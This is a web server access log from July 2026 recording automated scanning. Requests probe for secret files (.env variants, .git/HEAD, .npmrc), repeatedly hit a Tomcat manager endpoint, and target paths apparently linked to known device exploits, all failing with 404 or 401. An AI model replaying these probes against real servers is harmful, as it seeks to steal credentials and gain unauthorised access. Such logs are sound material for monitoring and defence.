45.148.10.200 - - [21/Jul/2026:20:26:13 +0200] "GET /.env.local HTTP/1.1" 404 728
45.148.10.200 - - [21/Jul/2026:20:26:13 +0200] "GET /api/.env HTTP/1.1" 404 730
45.148.10.200 - - [21/Jul/2026:20:26:13 +0200] "GET /.env.development HTTP/1.1" 404 734
45.148.10.200 - - [21/Jul/2026:20:26:13 +0200] "GET /.env.bak HTTP/1.1" 404 726
45.148.10.200 - - [21/Jul/2026:20:26:13 +0200] "GET /.git/HEAD HTTP/1.1" 404 731
45.148.10.200 - - [21/Jul/2026:20:26:13 +0200] "GET /.npmrc HTTP/1.1" 404 724
45.148.10.200 - - [21/Jul/2026:20:26:13 +0200] "GET /backend/.env HTTP/1.1" 404 734
114.80.33.21 - - [21/Jul/2026:20:26:33 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:20:30:13 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:20:33:46 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
160.119.76.24 - - [21/Jul/2026:20:36:05 +0200] "GET / HTTP/1.1" 200 1895
114.80.33.21 - - [21/Jul/2026:20:37:29 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:20:40:58 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:20:44:39 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
5.61.209.92 - - [21/Jul/2026:20:46:11 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 737
114.80.33.21 - - [21/Jul/2026:20:48:11 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
165.154.164.79 - - [21/Jul/2026:20:51:14 +0200] "-" 400 1930
165.154.164.79 - - [21/Jul/2026:20:51:24 +0200] "GET / HTTP/1.1" 200 1895
165.154.164.79 - - [21/Jul/2026:20:51:42 +0200] "GET /favicon.ico HTTP/1.1" 404 729
165.154.164.79 - - [21/Jul/2026:20:51:42 +0200] "GET /robots.txt HTTP/1.1" 404 728
165.154.164.79 - - [21/Jul/2026:20:51:42 +0200] "GET /sitemap.xml HTTP/1.1" 404 729
165.154.164.79 - - [21/Jul/2026:20:51:42 +0200] "GET /config.json HTTP/1.1" 404 729
114.80.33.21 - - [21/Jul/2026:20:51:54 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
94.154.43.140 - - [21/Jul/2026:20:51:54 +0200] "GET /login HTTP/1.1" 404 723
160.119.76.24 - - [21/Jul/2026:20:53:52 +0200] "GET / HTTP/1.1" 200 1895
160.119.76.24 - - [21/Jul/2026:20:53:52 +0200] "GET /favicon.ico HTTP/1.1" 404 729
160.119.76.24 - - [21/Jul/2026:20:53:53 +0200] "GET /robots.txt HTTP/1.1" 404 728
160.119.76.24 - - [21/Jul/2026:20:53:54 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 746
114.80.33.21 - - [21/Jul/2026:20:55:24 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:20:59:04 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
94.154.43.230 - - [21/Jul/2026:21:00:35 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
114.80.33.21 - - [21/Jul/2026:21:02:37 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
